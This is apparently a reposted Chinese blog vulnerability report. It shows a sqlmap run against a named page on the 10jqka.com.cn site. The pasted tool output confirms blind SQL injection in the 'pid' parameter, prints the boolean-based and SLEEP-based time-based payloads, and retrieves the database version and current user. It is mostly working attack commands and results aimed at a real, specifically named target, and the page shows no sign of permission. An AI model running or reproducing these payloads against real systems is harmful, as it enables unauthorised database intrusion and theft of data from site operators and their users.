sql注入 mysql root_同花顺主站存在SQL注入(ROOT权限)

此博客展示了如何使用SQLMap工具对10jqka.com.cn网站的参数注入进行检测,通过逐层测试发现多个可注入点,包括MySQL版本判断和盲注技术。作者还揭示了后端数据库为MySQL 5.0.12,并获取了当前用户信息。
摘要由CSDN通过智能技术生成

http://www.10jqka.com.cn/ad_mar/tgt_lwds/index.php?op=post_info&pid=18

1

http://www.10jqka.com.cn/ad_mar/tgt_lwds/index.php?op=post_info&pid=18

pid参数存在注入python sqlmap.py -c sqlmap.conf -u "http://www.10jqka.com.cn/ad_mar/tgt_lwds/index.php?op=post_info&pid=18" --level 2 --dbms=mysql --current-user -p pid____ ___|_____ ___ ___ {1.0-stable}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _||_| |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 23:00:57[23:00:57] [INFO] fetched random HTTP User-Agent header from file 'D:\Tools\sqlmap-1.0\txt\user-agents.txt': 'Mozilla/5.0Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5'[23:00:58] [INFO] testing connection to the target URL[23:00:58] [INFO] testing if the target URL is stable[23:00:59] [INFO] target URL is stable[23:00:59] [WARNING] heuristic (basic) test shows that GET parameter 'pid' might not be injectable[23:00:59] [INFO] testing for SQL injection on GET parameter 'pid'[23:00:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[23:01:01] [INFO] GET parameter 'pid' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="\u6539\u6587\u7ae0\u5c1a\u672a\u901a\u8fc7\u5ba1\u6838")[23:01:01] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'[23:01:02] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'[23:01:02] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'[23:01:02] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'[23:01:02] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'[23:01:02] [INFO] testing 'MySQL inline queries'[23:01:02] [INFO] testing 'MySQL >= 5.0.12 AND/OR time-based blind (SELECT)'[23:01:02] [WARNING] time-based comparison requires larger statistical model, please wait........ (done)[23:01:19] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)[23:01:29] [INFO] GET parameter 'pid' seems to be 'MySQL >= 5.0.12 AND/OR time-based blind (SELECT)' injectablefor the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (1) values? [Y/n][23:01:32] [INFO] checking if the injection point on GET parameter 'pid' is a false positiveGET parameter 'pid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection point(s) with a total of 42 HTTP(s) requests:---Parameter: pid (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: op=post_info&pid=18' AND 2489=2489 AND 'WFQL'='WFQLType: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND/OR time-based blind (SELECT)Payload: op=post_info&pid=18' XOR (SELECT * FROM (SELECT(SLEEP(5)))pcCt) AND 'RSjT'='RSjT---[23:01:37] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0.12[23:01:37] [INFO] fetching current user[23:01:37] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[23:01:37] [INFO] retrieved: [email protected]current user: '[email protected]'

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值